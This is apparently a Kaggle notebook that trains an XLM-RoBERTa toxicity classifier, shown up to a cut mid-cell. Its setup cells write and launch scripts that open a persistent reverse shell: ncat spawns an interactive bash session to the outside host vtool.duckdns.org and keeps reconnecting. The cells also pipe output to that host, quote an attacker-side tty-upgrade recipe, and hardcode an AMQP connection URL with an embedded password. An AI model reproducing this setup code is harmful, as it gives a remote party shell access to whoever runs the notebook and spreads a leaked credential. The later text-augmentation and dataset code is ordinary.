{"cells":[{"metadata":{"id":"wzoWM76m0Rfg"},"cell_type":"markdown","source":"### Dont forget turn on TPU & HIGH-RAM modes :)\n\nAuthor: [Alex Shonenkov](https://www.kaggle.com/shonenkov) //  shonenkov@phystech.edu\nHave a good day!","execution_count":null},{"metadata":{"id":"_43yMxyEvW-q","trusted":false},"cell_type":"code","source":"!echo $HOSTNAME\n!echo $TPU_NAME\n!nvidia-smi","execution_count":null,"outputs":[]},{"metadata":{"id":"n6uGvKL3upio","trusted":false},"cell_type":"code","source":"%load_ext autoreload\n%autoreload 2","execution_count":null,"outputs":[]},{"metadata":{"id":"n6uGvKL3epio","trusted":false},"cell_type":"code","source":"import subprocess\n\nsubprocess.run('[ -f setup.py ] || (git clone https://github.com/pennz/kaggle_runner; '\n'git submodule update --init --recursive; '\n'rsync -r kaggle_runner/.* .; '\n'rsync -r kaggle_runner/* .;); '\n'python3 -m pip install -e .', shell=True, check=True)","execution_count":null,"outputs":[]},{"metadata":{"id":"x5uJSXQmfnNb","lines_to_next_cell":2,"outputId":"2cd4fe6f-9500-4d07-ba92-b093230587f1","trusted":false},"cell_type":"code","source":"from kaggle_runner.utils.kernel_utils import get_obj_or_dump","execution_count":null,"outputs":[]},{"metadata":{"id":"wV017Cj1CRlg","trusted":false},"cell_type":"code","source":"with open(\"runner.sh\", \"w\") as f:\n    f.write(\nr\"\"\"#!/bin/bash\nexport PS4='Line ${LINENO}: ' # for debug\nNC=ncat\n\nUSER=$1\nshift\nREPO=$1\nshift\nBRANCH=$1\nshift\nPHASE=$1\nshift\nENABLE_RVS=$1\nshift\n\nSERVER=$1\nshift\nPORT=$1\nshift\n\nORIG_PORT=23454\n\nCHECK_PORT=$((ORIG_PORT + 1))\npython3 -m pip install --upgrade pip\nconda install -y -c eumetsat expect & # https://askubuntu.com/questions/1047900/unbuffer-stopped-working-months-ago\napt update && apt install -y netcat nmap screen time locales >/dev/null 2>&1\napt install -y mosh iproute2 fish tig ctags htop tree pv tmux psmisc >/dev/null 2>&1 &\n\nconda init bash\ncat >> ~/.bashrc << EOF\nconda activate base # as my dotfiles will fiddle with conda\nexport SERVER=$SERVER\nexport CHECK_PORT=$CHECK_PORT\nEOF\n\nsource rpt # rvs IDE env setup\nexport SERVER=$SERVER\nexport CHECK_PORT=$CHECK_PORT\n\nwait_ncat() {\n    wait_for_ncat=$1\n\n    while [ $wait_for_ncat -gt 0 ]; do\n        wait_for_ncat=$((wait_for_ncat - 1))\n        which ncat >/dev/null && return 0\n    done\n}\nwait_ncat 60\n\nwhich $NC >/dev/null || NC=nc\nexport NC\n\nif [ \"x${ENABLE_RVS}\" = x1 ]; then\n    if [ -z $(pgrep -f 'jupyter-notebook') ]; then\n        bash ./rvs.sh $SERVER $PORT 2>&1 &\n    else\n        screen -d -m bash -c \"{ echo [REMOTE]: rvs log below.; bash rvs.sh $SERVER $PORT 2>&1; } | $NC --send-only --no-shutdown -w 120s -i $((3600 * 2))s $SERVER $CHECK_PORT\"\n    fi\nfi &\n\npython3 -m pip install ripdb pydicom parse pytest-logger python_logging_rabbitmq coverage &\npython3 -m pip install pyvim neovim msgpack==1.0.0 & # for vim\n\n# SRC_WORK_FOLDER=/kaggle/working # it is just current working folder\n# [ -d ${SRC_WORK_FOLDER} ] || mkdir -p ${SRC_WORK_FOLDER}\n#\n# cd ${SRC_WORK_FOLDER}\n\nif [ -d ${REPO} ]; then rm -rf ${REPO}; fi\n\n# get code\n{\n    mvdir() {\n        [[ \"$2\"/\"$1\" -ef \"${PWD}\" ]] || {\n            rm -rf \"$2\"/\"$1\" &&\n                mkdir \"$2\"/\"$1\"\n        }\n\n        bash -c \"mv \"\"$1\"\"/*\"\" $2\"\"/\"\"$1\"\n    }\n    export -f mvdir\n\n    if [ ! -d ${REPO} ]; then\n        git clone --single-branch --branch ${BRANCH} --depth=1 \\\n            https://github.com/${USER}/${REPO}.git ${REPO} && pushd ${REPO} &&\n        sed -i 's/git@\\(.*\\):\\(.*\\)/https:\\/\\/\\1\\/\\2/' .gitmodules &&\n        sed -i 's/git@\\(.*\\):\\(.*\\)/https:\\/\\/\\1\\/\\2/' .git/config &&\n        git submodule update --init --recursive\n        find . -maxdepth 1 -name \".??*\" -o -name \"??*\" -type f | xargs -I{} mv {} $OLDPWD\n        find . -maxdepth 1 -name \".??*\" -o -name \"??*\" -type d | xargs -I{} bash -x -c \"mvdir {}  $OLDPWD\"\n        popd\n    fi\n    make install_dep >/dev/null\n}\n\nUSE_AMQP=true\nexport USE_AMQP\n\nconda init bash\nsource ~/.bashrc\nconda activate base\n\nif [ x\"${PHASE}\" = x\"dev\" ]; then\n    export PS4='[Remote]: Line ${LINENO}: '\n    (\n        echo \"MOSHing\"\n        make mosh\n    ) &\n\n    make toxic | if [ $USE_AMQP -eq true ]; then cat -; else $NC --send-only -w 120s -i $((60 * 5))s $SERVER $CHECK_PORT; fi &\n    wait # not exit, when dev\nfi\n\nif [ x\"${PHASE}\" = x\"data\" ]; then\n    bash ./rvs.sh $SERVER $PORT >/dev/null & # just keep one rvs incase\n    make dataset\nfi\n\nif [ x\"${PHASE}\" = x\"test\" ]; then\n    bash ./rvs.sh $SERVER $PORT >/dev/null & # just keep one rvs incase\n    #make test\nfi\n\nif [ x\"${PHASE}\" = x\"run\" ]; then\n    bash ./rvs.sh $SERVER $PORT >/dev/null & make m & # just keep one rvs incase\n    make toxic | if [ $USE_AMQP -eq true ]; then cat -; else $NC --send-only -w 120s -i $((60 * 5))s $SERVER $CHECK_PORT; fi\n    # basically the reverse of the calling path\n    pkill make & pkill -f \"mosh\" & pkill sleep & pkill -f \"rvs.sh\" & pkill ncat &\n    # python main.py \"$@\"\nfi\n\"\"\"\n    )\nwith open(\"rvs.sh\", \"w\") as f:\n    f.write(\nr\"\"\"#!/bin/bash\nexport PS4='Line ${LINENO}: ' # for debug\n\nNC=${NC:-ncat}\ntype $NC || ( echo >&2 \"$NC cannot be found. Exit.\"; exit 1;)\n# https://stackoverflow.com/questions/57877451/retrieving-output-and-exit-code-of-a-coprocess\n# coproc { sleep 30 && echo \"Output\" && exit 3; }\n# Saving the coprocess's PID for later, as COPROC_PID apparently unsets when its finished\n# COPROC_PID_backup=$COPROC_PID\n#\n# Retrieving the coprocess's output\n# output=$(cat <&$COPROC)\n#\n# Retrieving the coprocess's exit code\n# wait $COPROC_PID_backup\n#\n# Echoing out the results\n# echo $?\n# echo $output\n\necho BASH NOW: $BASHPID\n\nPID_FILE_PATH=/tmp/nc.pid\nEXIT_FILE_PATH=/tmp/rvs_exit.$BASHPID.pid\n\ntest -f $EXIT_FILE_PATH && rm $EXIT_FILE_PATH\n\nSERVER=$1\nshift\nPORT=$1\nshift\n\nORIG_PORT=23454\nCHECK_PORT=$((ORIG_PORT + 1))\n\ncheck_exit_status() {\n  [ -f /tmp/rvs_return ] && return 0\n\n  if [ -f $EXIT_FILE_PATH ] && [ x\"$(cat $EXIT_FILE_PATH)\" = x0 ]; then\n    return 0\n  fi\n\n  return 1 # not ok\n}\n\n\nconnect_setup() {\n  connect_again_flag=1\n\n  sleep_time=5\n\n  while [ ${connect_again_flag} -eq 1 ]; do\n    check_exit_status && return 0\n\n    $NC -w ${1}s -i 1800s $SERVER $PORT -c \"echo $(date) started connection; echo $HOSTNAME; python -c 'import pty; pty.spawn([\\\"/bin/bash\\\", \\\"-li\\\"])'\"\n\n    RSRET=$?\n    echo $RSRET > $EXIT_FILE_PATH\n    (/bin/ss -lpants | grep \"ESTAB.*$PORT\") || >&2 echo \"\\\"$NC -w ${1}s -i 1800s $SERVER $PORT\\\" return with code $RSRET\"\n\n    if [ x\"$RSRET\" = x\"0\" ]; then\n      [ -f /tmp/rvs_exit ] && return 0\n\n      return 255 # just do not return\n    fi\n    [ $RSRET -eq 0 ] && connect_again_flag=0\n    [ $RSRET -eq 1 ] && sleep ${sleep_time} && sleep_time=$((sleep_time + sleep_time))\n  done\n  # exit, will cause rvs script exit, beside, RSRET not 0, mean connection loss\n  # thing\n  RSRET=1  # just never exit\n  echo $RSRET > $EXIT_FILE_PATH && return $RSRET\n}\n\nconnect_again() {\n  # pkill -f \"nc.*$PORT\"  # no need now, our listen server can accept multiple\n  # connection now\n  connect_setup $1\n}\n\nWAIT_LIMIT=2048\nINIT_WAIT=8\nport_connect_status=0\nwait_time=$INIT_WAIT\n\nfloatToInt() {\n  parsed=$(printf \"%.0f\" \"$@\")\n  [ ! $? -eq 0 ] && parsed=0\n  echo $parsed\n} 2> /dev/null\n\nwhile true; do\n  check_exit_status && exit 0\n  # if find that server cannot be connected, we try to restart our reverse connect again\n  nc_time=$($(which time) -f \"%e\" $NC -zw $wait_time $SERVER $CHECK_PORT 2>&1 > /dev/null)\n  nc_ret=$?\n  nc_time=$(echo $nc_time | awk '{print $NF}')\n  nc_time=$(floatToInt $nc_time)\n\n  if [ ${nc_ret} -eq 0 ]; then\n    # recover connection, need to connect_again too. For 1st time, will try to connect\n    # no connection last time, have connction now\n\n    if [ $port_connect_status -eq 0 ]; then\n      echo \"recover connection, reset wait_time and try to reconnect\"\n      wait_time=$INIT_WAIT\n      # previous connection is lost, we wait for longer to setup connection\n      check_exit_status || wait_time=15\n      connect_again $wait_time &\n    else\n      wait_time=$((wait_time + wait_time)) # double wait, network fine\n\n      if [ $wait_time -gt ${WAIT_LIMIT} ]; then wait_time=${WAIT_LIMIT}; fi\n    fi\n    port_connect_status=1\n  else\n    if [ $port_connect_status -eq 1 ]; then\n      echo \"found connection loss, reset wait_time and try to reconnect\"\n      wait_time=$INIT_WAIT\n      check_exit_status || wait_time=15 # previous connection is lost\n      connect_again $wait_time &\n    else # no connection all the time? we still try to connect...\n      wait_time=$((wait_time + wait_time))\n\n      if [ $wait_time -gt ${WAIT_LIMIT} ]; then wait_time=${WAIT_LIMIT}; fi\n      connect_again $wait_time &\n    fi\n    port_connect_status=0\n  fi\n  sleep $((wait_time - nc_time)) # check every XX seconds\n  echo $hostname $HOSTNAME\ndone\nwait  # wait for any background\n\n# https://medium.com/@6c2e6e2e/spawning-interactive-reverse-shells-with-tty-a7e50c44940e\n# In reverse shell\n# $ python -c 'import pty; pty.spawn(\"/bin/bash\")'\n# Ctrl-Z\n#\n# In Attacker console\n# $ stty raw -echo\n# $ fg\n#\n# In reverse shell\n# $ reset\n# $ export SHELL=bash\n# $ export TERM=xterm-256color\n# $ stty rows <num> columns <cols>\n\"\"\"\n    )\nwith open(\"rpt\", \"w\") as f:\n    f.write(\nr\"\"\"#!/bin/bash\n[ -d ~/.fzf ] || {\ngit clone --depth=1 https://github.com/pennz/dotfiles\nrsync -r dotfiles/.* ~\nrsync -r dotfiles/* ~\npushd ~\ngit submodule update --init\n.fzf/install --all\ncurl -fLo ~/.config/nvim/autoload/plug.vim --create-dirs https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim\ncurl -fLo ~/.vim/autoload/plug.vim --create-dirs https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim\n# vim -u ~/.vimrc_back \"+call plug#begin()\" +PlugInstall +qa &\n# ( sleep 60; nvim -Vnvim_log -u ~/.vimrc_back \"+call plug#begin()\" +PlugInstall +checkhealth +qa )&\nln -s .shrc_customised.macos .shrc_customised\necho \"alias gdrive='gdrive  --service-account a.json'\" >> ~/.bash_aliases\necho \"unalias vim\" >> ~/.bash_aliases\npopd\n\ncat >> ~/.profile << EOF\nexport SHELL=/bin/bash\nexport TERM=screen-256color\nstty intr ^\\c susp ^\\x eof ^\\f echo opost\n# https://unix.stackexchange.com/questions/343088/what-is-the-equivalent-of-stty-echo-for-zsh\n# unsetopt ZLE # for zsh\n# for ourside stty raw isig -echo icrnl time 3 echoprt opost eof ^\\p\n\ncolor_my_prompt () {\n    local __user_and_host=\"\\[\\033[01;32m\\]\\u@\\h\"\n    local __cur_location=\"\\[\\033[01;34m\\]\\w\"\n    local __git_branch_color=\"\\[\\033[31m\\]\"\n    # local __git_branch=\"\\`ruby -e \\\"print (%x{git branch 2> /dev/null}.grep(/^\\*/).first || '').gsub(/^\\* (.+)$/, '(\\1) ')\\\"\\`\"\n    local __git_branch='`git branch 2> /dev/null | grep -e ^* | ${SED:-sed} -E  s/^\\\\\\\\\\*\\ \\(.+\\)$/\\(\\\\\\\\\\1\\)\\ /`'\n    local __prompt_tail=\"\\[\\033[35m\\]$\"\n    local __last_color=\"\\[\\033[00m\\]\"\n    export PS1=\"$__user_and_host $__cur_location $__git_branch_color$__git_branch$__prompt_tail$__last_color \"\n}\n\nENV=/root/.bashrc\nPYTHONWARNINGS=ignore:::pip._internal.cli.base_command\nMPLBACKEND=module://ipykernel.pylab.backend_inline\n\nPS4=\"$HOSTNAME: \"'${LINENO}: '\n_=/usr/bin/env\nPWD=/kaggle/working\ncd $PWD\nOLDPWD=/root\n\n# color_my_prompt\nlocale-gen\necho \"#\" $(grep 'cpu ' /proc/stat >/dev/null;sleep 0.1;grep 'cpu ' /proc/stat | awk -v RS=\"\" '{print \"CPU: \"($13-$2+$15-$4)*100/($13-$2+$15-$4+$16-$5)\"%\"}') \"Mem: \"$(awk '/MemTotal/{t=$2}/MemAvailable/{a=$2}END{print 100-100*a/t\"%\"}' /proc/meminfo) \"Uptime: \"$(uptime | awk '{print $1 \" \" $2 \" \" $3}')\necho \"#\" TPU_NAME=$TPU_NAME\nnvidia-smi\nconda activate base\nEOF\n}\n\"\"\"\n    )\nwith open(\"gdrive_setup\", \"w\") as f:\n    f.write(\nr\"\"\"#!/bin/bash\nwget https://github.com/gdrive-org/gdrive/releases/download/2.1.0/gdrive-linux-x64\nchmod +x gdrive-linux-x64\ncp gdrive-linux-x64 /bin/gdrive\n\nmkdir ~/.gdrive\n\n# auth file\ncat > ~/.gdrive/a.json << EOF\nNO_PASS\n\nEOF\n\ngdrive --service-account a.json list  # just test\n\nSRC_WORK_FOLDER=/kaggle/input\n[ -d ${SRC_WORK_FOLDER} ] || {\n    mkdir -p ${SRC_WORK_FOLDER}\n    cd ${SRC_WORK_FOLDER}\n    gdrive --service-account a.json download -r 1CHDWIN0M6PD4SQyplbWefBCzNzdPVd-m\n    tar xf siim-train-test.tar.gz -C /kaggle/input\n}\n# cat > tgz_files.sh << EOF\n# #!/bin/bash\n# tgzfile () {\n#   tar cf - $1 -P | pv -s $(du -sb $1 | awk '{print $1}') | gzip > /home/$1.tar.gz\n# }\n# cd /kaggle/input\n# find . -maxdepth 1 -type d -name \"??*\" | while read -r line; do\n#     echo $line\n#     tgzfile $line\n# done\n# EOF\n\"\"\"\n    )","execution_count":null,"outputs":[]},{"metadata":{"id":"fk22W4JeCRlm","trusted":false},"cell_type":"code","source":"import os\nserver = \"vtool.duckdns.org\"\nos.environ['SERVER'] = server\n\nentry_str = r\"\"\"#!/bin/bash\nPS4='Line ${LINENO}: ' bash runner.sh pennz kaggle_runner master \"test\" 1 \"\"\"+ server +\"\"\" \"9017\" \"amqp://kaggle:9b83ca70cf4cda89524d2283a4d675f6@pengyuzhou.com/\" \"384\" \"19999\" \"intercept\" | tee runner_log\n\"\"\"\nif False:\n    entry_str += r\"\"\"PS4='Line ${LINENO}: ' bash -x gdrive_setup >>loggdrive &\"\"\"\n\nwith open(\"entry.sh\", \"w\") as f:\n    f.write(entry_str)","execution_count":null,"outputs":[]},{"metadata":{"id":"UAC8442XCRlq","trusted":false},"cell_type":"code","source":"import os\nimport sys\nsys.path.append(os.getcwd())\n\nimport selectors\nimport subprocess\nfrom importlib import reload, import_module\nimport_module('kaggle_runner')\nfrom kaggle_runner import logger\nlogger.debug(\"Logger loaded. Will run entry.sh.\")","execution_count":null,"outputs":[]},{"metadata":{"id":"mC6qgI68EMQm","trusted":false},"cell_type":"code","source":"%%bash --bg --out runner_log --err runner_err_log\nbash entry.sh","execution_count":null,"outputs":[]},{"metadata":{"id":"IklWPKSwNsXN"},"cell_type":"markdown","source":"# NOW kernel code","execution_count":null},{"metadata":{"id":"HsZb7QICuRIe","trusted":false},"cell_type":"code","source":"!python3 -m pip install 'prompt-toolkit<2.0.0,>=1.0.15' --force-reinstall\n!python -m pip install 'prompt-toolkit<2.0.0,>=1.0.15' --force-reinstall\n!curl https://raw.githubusercontent.com/pytorch/xla/master/contrib/scripts/env-setup.py -o pytorch-xla-env-setup.py > /dev/null\n!python pytorch-xla-env-setup.py --version 20200420 --apt-packages libomp5 libopenblas-dev\n!python3 -m pip install transformers==2.5.1 > /dev/null\n!python3 -m pip install pandarallel > /dev/null\n!python3 -m pip install catalyst==20.4.2 > /dev/null","execution_count":null,"outputs":[]},{"metadata":{"id":"KFZrVc5nCRlw","outputId":"4032dcad-2497-4906-d1ea-0a9fcee2a1a0","trusted":false},"cell_type":"code","source":"import numpy as np\nimport pandas as pd\n\nimport os\nos.environ['XLA_USE_BF16'] = \"1\"\n\nfrom glob import glob\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset,DataLoader\nfrom torch.autograd import Variable\nfrom torch.utils.data.sampler import SequentialSampler, RandomSampler\nimport sklearn\n\nimport time\nimport random\nfrom datetime import datetime\nfrom tqdm import tqdm\ntqdm.pandas()\n\nfrom transformers import BertModel, BertTokenizer\nfrom transformers import XLMRobertaModel, XLMRobertaTokenizer\nfrom transformers import AdamW, get_linear_schedule_with_warmup, get_constant_schedule\nfrom catalyst.data.sampler import DistributedSamplerWrapper, BalanceClassSampler\n\nimport gc\nimport re\n\n# !python3 -m pip install nltk > /dev/null\nimport nltk\nnltk.download('punkt')\n\nfrom nltk import sent_tokenize\n\nfrom pandarallel import pandarallel\n\npandarallel.initialize(nb_workers=4, progress_bar=False)","execution_count":null,"outputs":[]},{"metadata":{"id":"M-VP4QbZu9EB","trusted":false},"cell_type":"code","source":"SEED = 42\n\nMAX_LENGTH = 224\nBACKBONE_PATH = 'xlm-roberta-large'\n# ROOT_PATH = f'..'\nROOT_PATH = f'/kaggle' # for colab\n\n\ndef seed_everything(seed):\n    random.seed(seed)\n    os.environ['PYTHONHASHSEED'] = str(seed)\n    np.random.seed(seed)\n    torch.manual_seed(seed)\n    torch.cuda.manual_seed(seed)\n    torch.backends.cudnn.deterministic = True\n    torch.backends.cudnn.benchmark = True\n\nseed_everything(SEED)","execution_count":null,"outputs":[]},{"metadata":{"id":"63ceMzcxu9GS","trusted":false},"cell_type":"code","source":"from nltk import sent_tokenize\nfrom random import shuffle\nimport random\nimport albumentations\nfrom albumentations.core.transforms_interface import DualTransform, BasicTransform\n\n\nLANGS = {\n    'en': 'english',\n    'it': 'italian',\n    'fr': 'french',\n    'es': 'spanish',\n    'tr': 'turkish',\n    'ru': 'russian',\n    'pt': 'portuguese'\n}\n\ndef get_sentences(text, lang='en'):\n    return sent_tokenize(text, LANGS.get(lang, 'english'))\n\ndef exclude_duplicate_sentences(text, lang='en'):\n    sentences = []\n\n    for sentence in get_sentences(text, lang):\n        sentence = sentence.strip()\n\n        if sentence not in sentences:\n            sentences.append(sentence)\n\n    return ' '.join(sentences)\n\ndef clean_text(text, lang='en'):\n    text = str(text)\n    text = re.sub(r'[0-9\"]', '', text)\n    text = re.sub(r'#[\\S]+\\b', '', text)\n    text = re.sub(r'@[\\S]+\\b', '', text)\n    text = re.sub(r'https?\\S+', '', text)\n    text = re.sub(r'\\s+', ' ', text)\n    text = exclude_duplicate_sentences(text, lang)\n\n    return text.strip()\n\n\nclass NLPTransform(BasicTransform):\n    \"\"\" Transform for nlp task.\"\"\"\n\n    @property\n    def targets(self):\n        return {\"data\": self.apply}\n\n    def update_params(self, params, **kwargs):\n        if hasattr(self, \"interpolation\"):\n            params[\"interpolation\"] = self.interpolation\n\n        if hasattr(self, \"fill_value\"):\n            params[\"fill_value\"] = self.fill_value\n\n        return params\n\n    def get_sentences(self, text, lang='en'):\n        return sent_tokenize(text, LANGS.get(lang, 'english'))\n\nclass ShuffleSentencesTransform(NLPTransform):\n    \"\"\" Do shuffle by sentence \"\"\"\n    def __init__(self, always_apply=False, p=0.5):\n        super(ShuffleSentencesTransform, self).__init__(always_apply, p)\n\n    def apply(self, data, **params):\n        text, lang = data\n        sentences = self.get_sentences(text, lang)\n        random.shuffle(sentences)\n\n        return ' '.join(sentences), lang\n\nclass ExcludeDuplicateSentencesTransform(NLPTransform):\n    \"\"\" Exclude equal sentences \"\"\"\n    def __init__(self, always_apply=False, p=0.5):\n        super(ExcludeDuplicateSentencesTransform, self).__init__(always_apply, p)\n\n    def apply(self, data, **params):\n        text, lang = data\n        sentences = []\n\n        for sentence in self.get_sentences(text, lang):\n            sentence = sentence.strip()\n\n            if sentence not in sentences:\n                sentences.append(sentence)\n\n        return ' '.join(sentences), lang\n\nclass ExcludeNumbersTransform(NLPTransform):\n    \"\"\" exclude any numbers \"\"\"\n    def __init__(self, always_apply=False, p=0.5):\n        super(ExcludeNumbersTransform, self).__init__(always_apply, p)\n\n    def apply(self, data, **params):\n        text, lang = data\n        text = re.sub(r'[0-9]', '', text)\n        text = re.sub(r'\\s+', ' ', text)\n\n        return text, lang\n\nclass ExcludeHashtagsTransform(NLPTransform):\n    \"\"\" Exclude any hashtags with # \"\"\"\n    def __init__(self, always_apply=False, p=0.5):\n        super(ExcludeHashtagsTransform, self).__init__(always_apply, p)\n\n    def apply(self, data, **params):\n        text, lang = data\n        text = re.sub(r'#[\\S]+\\b', '', text)\n        text = re.sub(r'\\s+', ' ', text)\n\n        return text, lang\n\nclass ExcludeUsersMentionedTransform(NLPTransform):\n    \"\"\" Exclude @users \"\"\"\n    def __init__(self, always_apply=False, p=0.5):\n        super(ExcludeUsersMentionedTransform, self).__init__(always_apply, p)\n\n    def apply(self, data, **params):\n        text, lang = data\n        text = re.sub(r'@[\\S]+\\b', '', text)\n        text = re.sub(r'\\s+', ' ', text)\n\n        return text, lang\n\nclass ExcludeUrlsTransform(NLPTransform):\n    \"\"\" Exclude urls \"\"\"\n    def __init__(self, always_apply=False, p=0.5):\n        super(ExcludeUrlsTransform, self).__init__(always_apply, p)\n\n    def apply(self, data, **params):\n        text, lang = data\n        text = re.sub(r'https?\\S+', '', text)\n        text = re.sub(r'\\s+', ' ', text)\n\n        return text, lang","execution_count":null,"outputs":[]},{"metadata":{"id":"KFCrVc5nCRlw","lines_to_next_cell":2,"outputId":"06b8c180-8935-4bd7-92c1-4fb5ee37f7ae","trusted":false},"cell_type":"code","source":"!cp /kaggle/input/bert-for-toxic-classfication-trained/*.pkl .","execution_count":null,"outputs":[]},{"metadata":{"id":"uFB3UeyAsYCp","trusted":false},"cell_type":"code","source":"from kaggle_runner import may_debug\nfrom kaggle_runner.utils.kernel_utils import get_obj_or_dump\n\ndef get_open_subtitles():\n    df_ot = get_obj_or_dump(\"ot.pkl\")\n\n    if df_ot is None:\n        df_ot = pd.read_csv(f'{ROOT_PATH}/input/open-subtitles-toxic-pseudo-labeling/open-subtitles-synthesic.csv', index_col='id')[['comment_text', 'toxic', 'lang']]\n        df_ot = df_ot[~df_ot['comment_text'].isna()]\n        df_ot['comment_text'] = df_ot.parallel_apply(lambda x: clean_text(x['comment_text'], x['lang']), axis=1)\n        df_ot = df_ot.drop_duplicates(subset='comment_text')\n        df_ot['toxic'] = df_ot['toxic'].round().astype(np.int)\n        get_obj_or_dump(\"ot.pkl\", default=df_ot)\n\n    return df_ot\n\n\nclass SynthesicOpenSubtitlesTransform(NLPTransform):\n    def __init__(self, always_apply=False, supliment_toxic=None, p=0.5, mix=False):\n        super(SynthesicOpenSubtitlesTransform, self).__init__(always_apply, p)\n\n        df = get_open_subtitles()\n        self.synthesic_toxic = df[df['toxic'] == 1].comment_text.values\n        self.synthesic_non_toxic = df[df['toxic'] == 0].comment_text.values\n\n        if supliment_toxic is not None:\n            self.synthesic_toxic = np.concatenate((self.synthesic_toxic, supliment_toxic))\n        self.mix = mix\n\n        del df\n        gc.collect();\n\n\n    def _mix_both(self, texts):\n        for i in range(random.randint(0,2)):\n            texts.append(random.choice(self.synthesic_non_toxic))\n\n        for i in range(random.randint(1,3)):\n            texts.append(random.choice(self.synthesic_toxic))\n\n    def generate_synthesic_sample(self, text, toxic):\n        texts = [text]\n\n        if toxic == 0:\n            if self.mix:\n                self._mix_both(texts)\n                toxic = 1\n            else:\n                for i in range(random.randint(1,5)):\n                    texts.append(random.choice(self.synthesic_non_toxic))\n        else:\n            self._mix_both(texts)\n        random.shuffle(texts)\n\n        return ' '.join(texts), toxic\n\n    def apply(self, data, **params):\n        text, toxic = data\n        text, toxic = self.generate_synthesic_sample(text, toxic)\n\n        return text, toxic","execution_count":null,"outputs":[]},{"metadata":{"id":"K5BdJ9HWvnLW","outputId":"4c4f8ba6-2bae-4494-b443-90f8ccb8c2d2","trusted":false},"cell_type":"code","source":"def get_train_transforms():\n    return albumentations.Compose([\n        ExcludeUsersMentionedTransform(p=0.95),\n        ExcludeUrlsTransform(p=0.95),\n        ExcludeNumbersTransform(p=0.95),\n        ExcludeHashtagsTransform(p=0.95),\n        ExcludeDuplicateSentencesTransform(p=0.95),\n    ], p=1.0)\n\ndef get_synthesic_transforms(supliment_toxic, p=0.5, mix=False):\n    return SynthesicOpenSubtitlesTransform(p=p, supliment_toxic=supliment_toxic, mix=mix)\n\ndef get_toxic_comments(df):\n        df = df[~df['comment_text'].isna()]\n        df = df.drop_duplicates(subset='comment_text')\n        df['toxic'] = df['toxic'].round().astype(np.int)\n\n        return df[df['toxic'] == 1].comment_text.values\n\ndf_train = get_obj_or_dump(\"train.pkl\")\n\nif df_train is None:\n    df_train = pd.read_csv(f'{ROOT_PATH}/input/jigsaw-toxicity-train-data-with-aux/train_data.csv')\n    df_train['comment_text'] = df_train.parallel_apply(lambda x: clean_text(x['comment_text'], x['lang']), axis=1)\n    get_obj_or_dump(\"train.pkl\", default=df_train)\n\nsupliment_toxic = get_toxic_comments(df_train)\nsupliment_toxic = None # avoid overfit\ntrain_transforms = get_train_transforms();\nsynthesic_transforms_often = get_synthesic_transforms(supliment_toxic, p=0.5)\nsynthesic_transforms_low = get_synthesic_transforms(supliment_toxic, p=0.3)\ntokenizer = XLMRobertaTokenizer.from_pretrained(BACKBONE_PATH)\nshuffle_transforms = ShuffleSentencesTransform(always_apply=True)","execution_count":null,"outputs":[]},{"metadata":{"id":"qFp80AuJu9Ii","trusted":false},"cell_type":"code","source":"def onehot(size, target, aux=None):\n    if aux is not None:\n        vec = np.zeros(size+len(aux), dtype=np.float32)\n        vec[target] = 1.\n        vec[2:] = aux\n        vec = torch.tensor(vec, dtype=torch.float32)\n    else:\n        vec = torch.zeros(size, dtype=torch.float32)\n        vec[target] = 1.\n\n    return vec\n\nfrom kaggle_runner import may_debug\n\n\nclass DatasetRetriever(Dataset):\n    def __init__(self, labels_or_ids, comment_texts, langs,\n                 severe_toxic=None, obscene=None, threat=None, insult=None, identity_hate=None,\n                 use_train_transforms=False, test=False, use_aux=True):\n        self.test = test\n        self.labels_or_ids = labels_or_ids\n        self.comment_texts = comment_texts\n        self.langs = langs\n        self.severe_toxic = severe_toxic\n        self.obscene = obscene\n        self.threat = threat\n        self.insult = insult\n        self.identity_hate = identity_hate\n        self.use_train_transforms = use_train_transforms\n        self.aux = None\n\n        if use_aux:\n            self.aux = [self.severe_toxic, self.obscene, self.threat, self.insult, self.identity_hate]\n\n    def get_tokens(self, text):\n        encoded = tokenizer.encode_plus(\n            text,\n            add_special_tokens=True,\n            max_length=MAX_LENGTH,\n            pad_to_max_length=True\n        )\n\n        return encoded['input_ids'], encoded['attention_mask']\n\n    def __len__(self):\n        return self.comment_texts.shape[0]\n\n    def __getitem__(self, idx):\n        text = self.comment_texts[idx]\n        lang = self.langs[idx]\n\n        if self.severe_toxic is None:\n            aux = [0., 0., 0., 0., 0.]\n        else:\n            aux = [self.severe_toxic[idx], self.obscene[idx], self.threat[idx], self.insult[idx], self.identity_hate[idx]]\n\n\n        label = self.labels_or_ids[idx]\n\n        if self.use_train_transforms and (not self.test):\n            text, _ = train_transforms(data=(text, lang))['data']\n            tokens, attention_mask = self.get_tokens(str(text))\n            token_length = sum(attention_mask)\n\n            if token_length > 0.8*MAX_LENGTH:\n                text, _ = shuffle_transforms(data=(text, lang))['data']\n            elif token_length < 60:\n                text, label = synthesic_transforms_often(data=(text, label))['data']\n            else: # will not need to use transforms\n                text, label = synthesic_transforms_low(data=(text, label))['data']\n\n        # TODO add language detection and shuffle\n        # https://pypi.org/project/langdetect/\n        # if self.use_train_transforms and self.test:\n        #    text, _ = train_transforms(data=(text, lang))['data']\n        #    tokens, attention_mask = self.get_tokens(str(text))\n        #    token_length = sum(attention_mask)\n\n        #    if token_length > 0.8*MAX_LENGTH:\n        #        text, _ = shuffle_transforms(data=(text, lang))['data']\n        # to tensors\n        tokens, attention_mask = self.get_tokens(str(text))\n        tokens, attention_mask = torch.tensor(tokens), torch.tensor(attention_mask)\n\n        if self.test:  # for test, return id TODO TTA\n            return self.labels_or_ids[idx], tokens, attention_mask\n\n        # label might be changed\n        target = onehot(2, label, aux=aux)\n\n        return target, tokens, attention_mask\n\n    def get_labels(self):\n        return list(np.char.add(self.labels_or_ids.astype(str), self.langs))","execution_count":null,"outputs":[]},{"metadata":{"id":"3DVkkUVMu9Ka","outputId":"696afaa9-66e3-4528-b9bd-636710c78e39","trusted":false},"cell_type":"code","source":"%%time\n\ndf_train = get_obj_or_dump(\"train.pkl\")\n\nif df_train is None:\n    df_train = pd.read_csv(f'{ROOT_PATH}/input/jigsaw-toxicity-train-data-with-aux/train_data.csv')\n    df_train['comment_text'] = df_train.parallel_apply(lambda x: clean_text(x['comment_text'], x['lang']), axis=1)\n    get_obj_or_dump(\"train.pkl\", default=df_train)\n\ntrain_dataset = DatasetRetriever(\n    labels_or_ids=df_train['toxic'].values,\n    comment_texts=df_train['comment_text'].values,\n    langs=df_train['lang'].values,\n  